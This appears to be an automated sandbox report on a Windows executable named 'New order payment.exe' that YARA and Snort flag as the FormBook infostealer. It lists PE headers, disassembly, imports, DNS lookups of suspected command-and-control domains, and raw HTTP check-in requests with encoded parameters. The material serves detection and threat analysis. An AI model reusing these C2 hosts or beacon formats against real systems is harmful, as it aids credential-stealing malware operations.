                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                              Entrypoint Preview

                                                              Instruction
                                                              sub esp, 00000184h
                                                              push ebx
                                                              push ebp
                                                              push esi
                                                              push edi
                                                              xor ebx, ebx
                                                              push 00008001h
                                                              mov dword ptr [esp+20h], ebx
                                                              mov dword ptr [esp+14h], 00409168h
                                                              mov dword ptr [esp+1Ch], ebx
                                                              mov byte ptr [esp+18h], 00000020h
                                                              call dword ptr [004070B0h]
                                                              call dword ptr [004070ACh]
                                                              cmp ax, 00000006h
                                                              je 00007F9238853FA3h
                                                              push ebx
                                                              call 00007F9238856D84h
                                                              cmp eax, ebx
                                                              je 00007F9238853F99h
                                                              push 00000C00h
                                                              call eax
                                                              mov esi, 00407280h
                                                              push esi
                                                              call 00007F9238856D00h
                                                              push esi
                                                              call dword ptr [00407108h]
                                                              lea esi, dword ptr [esi+eax+01h]
                                                              cmp byte ptr [esi], bl
                                                              jne 00007F9238853F7Dh
                                                              push 0000000Dh
                                                              call 00007F9238856D58h
                                                              push 0000000Bh
                                                              call 00007F9238856D51h
                                                              mov dword ptr [00423F44h], eax
                                                              call dword ptr [00407038h]
                                                              push ebx
                                                              call dword ptr [0040726Ch]
                                                              mov dword ptr [00423FF8h], eax
                                                              push ebx
                                                              lea eax, dword ptr [esp+38h]
                                                              push 00000160h
                                                              push eax
                                                              push ebx
                                                              push 0041F4F0h
                                                              call dword ptr [0040715Ch]
                                                              push 0040915Ch
                                                              push 00423740h
                                                              call 00007F9238856984h
                                                              call dword ptr [0040710Ch]
                                                              mov ebp, 0042A000h
                                                              push eax
                                                              push ebp
                                                              call 00007F9238856972h
                                                              push ebx
                                                              call dword ptr [00407144h]

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7418 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0x9e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x27c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5aeb | 0x5c00 | False | 0.665123980978 | data | 6.42230569414 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1196 | 0x1200 | False | 0.458984375 | data | 5.20291736659 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1b038 | 0x600 | False | 0.432291666667 | data | 4.0475118296 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x25000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2d000 | 0x9e0 | 0xa00 | False | 0.45625 | data | 4.50948350161 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2d190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x2d478 | 0x100 | data | English | United States
RT_DIALOG | 0x2d578 | 0x11c | data | English | United States
RT_DIALOG | 0x2d698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2d6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x2d710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll | SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/27/21-16:20:06.775928 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49755 | 80 | 192.168.2.5 | 51.210.240.92
10/27/21-16:20:06.775928 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49755 | 80 | 192.168.2.5 | 51.210.240.92
10/27/21-16:20:06.775928 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49755 | 80 | 192.168.2.5 | 51.210.240.92
10/27/21-16:20:27.846382 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49790 | 34.102.136.180 | 192.168.2.5
10/27/21-16:20:38.101341 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49791 | 80 | 192.168.2.5 | 74.208.236.134
10/27/21-16:20:38.101341 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49791 | 80 | 192.168.2.5 | 74.208.236.134
10/27/21-16:20:38.101341 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49791 | 80 | 192.168.2.5 | 74.208.236.134
10/27/21-16:20:54.027491 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49798 | 80 | 192.168.2.5 | 35.241.55.103
10/27/21-16:20:54.027491 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49798 | 80 | 192.168.2.5 | 35.241.55.103
10/27/21-16:20:54.027491 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49798 | 80 | 192.168.2.5 | 35.241.55.103
10/27/21-16:21:04.615059 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49800 | 80 | 192.168.2.5 | 52.210.179.84
10/27/21-16:21:04.615059 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49800 | 80 | 192.168.2.5 | 52.210.179.84
10/27/21-16:21:04.615059 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49800 | 80 | 192.168.2.5 | 52.210.179.84
10/27/21-16:21:04.661230 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49800 | 52.210.179.84 | 192.168.2.5

Network Port Distribution


                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Oct 27, 2021 16:20:06.712508917 CEST192.168.2.58.8.8.80xf370Standard query (0)www.salvationshippingsecurity.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:11.822491884 CEST192.168.2.58.8.8.80xc99cStandard query (0)www.mykombuchafactory.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:17.090502977 CEST192.168.2.58.8.8.80xf357Standard query (0)www.christinegagnonjewellery.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:22.154433012 CEST192.168.2.58.8.8.80xbd03Standard query (0)www.umgaleloacademy.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:27.684767962 CEST192.168.2.58.8.8.80x94b1Standard query (0)www.heyunshangcheng.infoA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:32.859416008 CEST192.168.2.58.8.8.80x88d5Standard query (0)www.sfcn-dng.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:37.928250074 CEST192.168.2.58.8.8.80x6bStandard query (0)www.crisisinterventionadvocates.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:43.266113997 CEST192.168.2.58.8.8.80xca7bStandard query (0)www.srchwithus.onlineA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:48.498081923 CEST192.168.2.58.8.8.80xc27eStandard query (0)www.itskosi.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:53.596335888 CEST192.168.2.58.8.8.80xefeeStandard query (0)www.sejiw3.xyzA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:59.343343973 CEST192.168.2.58.8.8.80xd5c3Standard query (0)www.hanansalman.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.495866060 CEST192.168.2.58.8.8.80x9355Standard query (0)www.rbrituelbeaute.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:09.669536114 CEST192.168.2.58.8.8.80xdf24Standard query (0)www.pronogtiki.storeA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Oct 27, 2021 16:20:06.743684053 CEST8.8.8.8192.168.2.50xf370No error (0)www.salvationshippingsecurity.comsalvationshippingsecurity.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:20:06.743684053 CEST8.8.8.8192.168.2.50xf370No error (0)salvationshippingsecurity.com51.210.240.92A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:11.851373911 CEST8.8.8.8192.168.2.50xc99cName error (3)www.mykombuchafactory.comnonenoneA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:17.121787071 CEST8.8.8.8192.168.2.50xf357Name error (3)www.christinegagnonjewellery.comnonenoneA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:22.632325888 CEST8.8.8.8192.168.2.50xbd03Server failure (2)www.umgaleloacademy.comnonenoneA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:27.706388950 CEST8.8.8.8192.168.2.50x94b1No error (0)www.heyunshangcheng.infoheyunshangcheng.infoCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:20:27.706388950 CEST8.8.8.8192.168.2.50x94b1No error (0)heyunshangcheng.info34.102.136.180A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:32.895567894 CEST8.8.8.8192.168.2.50x88d5Name error (3)www.sfcn-dng.comnonenoneA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:37.960422039 CEST8.8.8.8192.168.2.50x6bNo error (0)www.crisisinterventionadvocates.com74.208.236.134A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:43.288822889 CEST8.8.8.8192.168.2.50xca7bNo error (0)www.srchwithus.onlinesrchwithus.onlineCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:20:43.288822889 CEST8.8.8.8192.168.2.50xca7bNo error (0)srchwithus.online137.184.31.35A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:48.522423029 CEST8.8.8.8192.168.2.50xc27eNo error (0)www.itskosi.com3.67.234.155A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:48.522423029 CEST8.8.8.8192.168.2.50xc27eNo error (0)www.itskosi.com3.67.153.12A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:54.006380081 CEST8.8.8.8192.168.2.50xefeeNo error (0)www.sejiw3.xyz35.241.55.103A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:59.366530895 CEST8.8.8.8192.168.2.50xd5c3No error (0)www.hanansalman.comhanansalman.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:20:59.366530895 CEST8.8.8.8192.168.2.50xd5c3No error (0)hanansalman.com160.153.136.3A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)www.rbrituelbeaute.comweb.jimdosite.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)web.jimdosite.comdolphin-renderserve-prod.jimdo-platform.netCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-renderserve-prod.jimdo-platform.netdolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.210.179.84A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.214.190.156A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.209.227.237A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.212.67.61A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:09.724406958 CEST8.8.8.8192.168.2.50xdf24No error (0)www.pronogtiki.store5.101.153.216A (IP address)IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • www.salvationshippingsecurity.com
                                                              • www.heyunshangcheng.info
                                                              • www.crisisinterventionadvocates.com
                                                              • www.srchwithus.online
                                                              • www.itskosi.com
                                                              • www.sejiw3.xyz
                                                              • www.hanansalman.com

                                                              HTTP Packets

                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                               0 | 192.168.2.5 | 49755 | 51.210.240.92 | 80 | C:\Windows\explorer.exe
                                                               Timestamp | kBytes transferred | Direction | Data
                                                               Oct 27, 2021 16:20:06.775928020 CEST | 1395 | OUT | GET /u9xn/?EvGDLnJ=eYxsMd5wljUn1Fg6115NyaMNAPOWoN8Xbg1oh/XArMcWaLbikdCkMKkIXUVVkDc1SuQ5&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.salvationshippingsecurity.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                               Oct 27, 2021 16:20:06.802059889 CEST | 1396 | IN | HTTP/1.1 301 Moved Permanently
                                                              Server: nginx
                                                              Date: Wed, 27 Oct 2021 14:20:06 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 162
                                                              Connection: close
                                                              Location: https://www.salvationshippingsecurity.com/u9xn/?EvGDLnJ=eYxsMd5wljUn1Fg6115NyaMNAPOWoN8Xbg1oh/XArMcWaLbikdCkMKkIXUVVkDc1SuQ5&5j=0BKPgh7X4n
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                               1 | 192.168.2.5 | 49790 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                               Timestamp | kBytes transferred | Direction | Data
                                                               Oct 27, 2021 16:20:27.729743958 CEST | 9249 | OUT | GET /u9xn/?EvGDLnJ=RrR08BH4oIo+gx361vOF46QRRg434M3aJQMobyGncW6ZpM1n/iVBy8ajhiKV3UdnqaZn&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.heyunshangcheng.info
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                               Oct 27, 2021 16:20:27.846381903 CEST | 9250 | IN | HTTP/1.1 403 Forbidden
                                                              Server: openresty
                                                              Date: Wed, 27 Oct 2021 14:20:27 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 275
                                                              ETag: "61704c6b-113"
                                                              Via: 1.1 google
                                                              Connection: close
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                               2 | 192.168.2.5 | 49791 | 74.208.236.134 | 80 | C:\Windows\explorer.exe
                                                               Timestamp | kBytes transferred | Direction | Data
                                                               Oct 27, 2021 16:20:38.101341009 CEST | 9251 | OUT | GET /u9xn/?EvGDLnJ=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.crisisinterventionadvocates.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                               Oct 27, 2021 16:20:38.245042086 CEST | 9252 | IN | HTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Content-Length: 626
                                                              Connection: close
                                                              Date: Wed, 27 Oct 2021 14:20:38 GMT
                                                              Server: Apache
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                               3 | 192.168.2.5 | 49792 | 137.184.31.35 | 80 | C:\Windows\explorer.exe
                                                               Timestamp | kBytes transferred | Direction | Data
                                                               Oct 27, 2021 16:20:43.386756897 CEST | 9253 | OUT | GET /u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.srchwithus.online
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                               Oct 27, 2021 16:20:43.479991913 CEST | 9254 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 27 Oct 2021 14:20:43 GMT
                                                              Server: Apache/2.4.37 (centos) OpenSSL/1.1.1g
                                                              Location: https://www.srchwithus.online/u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&5j=0BKPgh7X4n
                                                              Content-Length: 338
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.srchwithus.online/u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&amp;5j=0BKPgh7X4n">here</a>.</p></body></html>


                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                               4 | 192.168.2.5 | 49794 | 3.67.234.155 | 80 | C:\Windows\explorer.exe
                                                               Timestamp | kBytes transferred | Direction | Data
                                                               Oct 27, 2021 16:20:48.543695927 CEST | 9263 | OUT | GET /u9xn/?EvGDLnJ=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.itskosi.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                               Oct 27, 2021 16:20:48.563533068 CEST | 9264 | IN | HTTP/1.1 301 Moved Permanently
                                                              cache-control: public, max-age=0, must-revalidate
                                                              content-length: 44
                                                              content-type: text/plain
                                                              date: Tue, 26 Oct 2021 10:09:50 GMT
                                                              x-nf-request-id: 01FK11ZZ198CWTS1MT7WAK41C6
                                                              location: https://www.itskosi.com/u9xn/?EvGDLnJ=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&5j=0BKPgh7X4n
                                                              server: Netlify
                                                              age: 101459
                                                              Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 73 6b 6f 73 69 2e 63 6f 6d 2f 75 39 78 6e 2f
                                                              Data Ascii: Redirecting to https://www.itskosi.com/u9xn/


                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                               5 | 192.168.2.5 | 49798 | 35.241.55.103 | 80 | C:\Windows\explorer.exe
                                                               Timestamp | kBytes transferred | Direction | Data
                                                               Oct 27, 2021 16:20:54.027491093 CEST | 9277 | OUT | GET /u9xn/?EvGDLnJ=Mi491nAN/W8j69kCQou8To2ktmeGxZt9RYONiJPW2rEgEezOpzjOfOleU2kzp5ym9Hqq&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.sejiw3.xyz
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                               Oct 27, 2021 16:20:54.332242012 CEST | 9278 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.14.0
                                                              Date: Wed, 27 Oct 2021 14:20:54 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 5379
                                                              Last-Modified: Fri, 30 Apr 2021 06:44:28 GMT
                                                              Vary: Accept-Encoding
                                                              ETag: "608ba74c-1503"
                                                              Cache-Control: no-cache
                                                              Accept-Ranges: bytes
                                                              Via: 1.1 google
                                                              Connection: close
                                                              Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.25.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,


                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                               6 | 192.168.2.5 | 49799 | 160.153.136.3 | 80 | C:\Windows\explorer.exe
                                                               Timestamp | kBytes transferred | Direction | Data
                                                               Oct 27, 2021 16:20:59.425259113 CEST | 9284 | OUT | GET /u9xn/?EvGDLnJ=FQ+FDzcRNFqTHDas5QzX/ZxEACq3iyWpSRLff56TNweY9Uo4XxUeKhcbnwpchSkctfqz&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.hanansalman.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                               Oct 27, 2021 16:20:59.480664968 CEST | 9284 | IN | HTTP/1.1 400 Bad Request
                                                              Connection: close


                                                              Code Manipulations

                                                              Statistics

                                                              Behavior

                                                              System Behavior

                                                              General

                                                               Start time: 16:18:59
                                                               Start date: 27/10/2021
                                                               Path: C:\Users\user\Desktop\New order payment.exe
                                                               Wow64 process (32bit): true
                                                               Commandline: 'C:\Users\user\Desktop\New order payment.exe'
                                                               Imagebase: 0x400000
                                                               File size: 254147 bytes
                                                               MD5 hash: 0C301355B11C3BC570D18B02BB7C99D8
                                                               Has elevated privileges: true
                                                               Has administrator privileges: true
                                                               Programmed in: C, C++ or other language
                                                               Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                               Reputation: low

                                                              General

                                                               Start time: 16:19:00
                                                               Start date: 27/10/2021
                                                               Path: C:\Users\user\Desktop\New order payment.exe
                                                               Wow64 process (32bit): true
                                                               Commandline: 'C:\Users\user\Desktop\New order payment.exe'
                                                               Imagebase: 0x400000
                                                               File size: 254147 bytes
                                                               MD5 hash: 0C301355B11C3BC570D18B02BB7C99D8
                                                               Has elevated privileges: true
                                                               Has administrator privileges: true
                                                               Programmed in: C, C++ or other language
                                                               Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
